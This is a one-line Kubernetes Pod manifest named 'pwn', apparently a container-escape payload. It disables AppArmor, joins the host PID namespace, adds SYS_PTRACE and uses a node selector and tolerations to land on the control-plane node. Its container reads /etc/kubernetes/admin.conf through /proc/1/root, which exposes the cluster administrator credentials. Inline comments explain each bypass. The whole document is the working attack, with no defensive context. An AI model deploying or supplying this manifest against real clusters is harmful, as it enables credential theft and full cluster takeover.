apiVersion: v1 kind: Pod metadata: name: pwn annotations: container.apparmor.security.beta.kubernetes.io/pwned: unconfined #disable apparmor spec: hostPID: true #root PID namespace containers: - name: pwn image: ubuntu command: [ "cat", "/proc/1/root/etc/kubernetes/admin.conf" ] securityContext: capabilities: add: - SYS_PTRACE # SYS_PTRACE to bypass ptrace access mode checks nodeSelector: # land on master node node-role.kubernetes.io/control-plane: '' tolerations: # tolerate control-plane node tains - key: "" operator: "Exists" effect: ""